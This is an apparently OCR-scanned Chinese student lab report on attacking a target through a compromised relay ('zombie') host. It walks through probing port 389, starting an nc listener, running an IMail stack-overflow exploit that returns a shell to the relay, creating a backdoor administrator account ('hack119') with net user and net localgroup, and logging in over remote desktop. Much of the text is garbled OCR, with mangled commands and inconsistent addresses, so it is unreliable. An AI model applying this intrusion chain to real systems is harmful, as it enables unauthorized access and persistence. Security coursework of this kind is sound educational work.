1、信息系统攻击与防御实验报告实验题目：利用肉机攻击目标机学 院专 业班 级 09级01班姓 名学 号 40909040125实验名称：利用肉机攻击目标机实验目的：黑客利用肉机攻击目标机开放的端口 ， 利用肉机的目的是隐藏自己的身份 ， 以免被发现 。
环境配置：1目标机为：192.168.11.612. 本地机为：192.168.11.663 .目标机的389端口即Idap服务打开4. 本地机的c盘下存在imail、nc软件 ， imail为栈溢出漏洞 ， 可以利 用该漏洞攻击对方 ， nc为小软件实现监听本地机器的未占用端口 。
5. 本地机的c盘下存在mstsc文件实验相关知识：1、端口对应的服务：25FMTP邮件42 。

2、:WINS110POP33389r终端服务389LDAP服务2、如何看本地端口？使用命令：n etstat -an3、黑客、肉机、目标机示意图:肉机1在内网中 ， IP地址为：192.168.11.100In ternet 出口地址：202.29.12.100贝U: DMz administrator看到的应为即内部地址：192.168.11.100 但从cmd中的命令行看到的是in ternet出口地址202.29.12.100尹TL|DM2脛昜券实验步骤：1、运行cmd命令进入命令提示状态；口需聲更1紗务暮卄资罰亏打开0： trti*提示结果:F命令堤示符HlcfoitofC l/lndAif 。

3、B 盘F【页木 5.1.ZbWJ 哦权所有 1185-ZHarl nicrosnft Qip.C ： D4cuMP ts d Set t IngoIs trTf&r 2、打开目标机的端口 389:使用命令：telnet目标机端口具体为：tel net 192.168.11.61 389提示结果：当目标机389端口打开时显示黑屏 ， 则认为目标机的389端口已打开 。
3、监听目标机的端口 81（ 80 一般不用）使用命令：nc - -p 81/其中：-I表示监听 ， -p表示端口 ， 81和80为本地机器的端口 。
提示结果：4、另外打开一个命令窗口 ， 因为 nc命令一直在监听81端口 方法：运行cmdr? xi远 。

【利用肉机攻击|《利用肉机攻击》】4、行提示结果:5、输入imail命令 ， 进入对方机器使用命令：imail 7_8 - 0 目标机-肉机-p 81/其中：-h表示目标机,-i表示肉机具体为：imail 7_8 - 0 -h 192.168.11.62-192.168.11.66 -p 81 提示结果：&在目标机中加入用户使用命令：net user用户名 密码/add 具体为：net user hack119 123 /add 提示结果：7、将所加用户加入组本地组使用命令：net localgroup administrators 用户名 /add 具体为：net localgroup admi ni strators hack119 /add 提示结果：8、运行mtstc文件 ， 连接目标机 ， 进行用户名登陆 ， 并且进行克隆账号使用命令：mtstc提示结果：i+MSl |Q2. n.ei-|匸置勺丨关硏I碑QP |选项国力|9、进入对方机器 点击连接按钮即可 。

来源：(未知)

【学习资料】网址：/a/2021/0318/0021715313.html

标题：利用肉机攻击|《利用肉机攻击》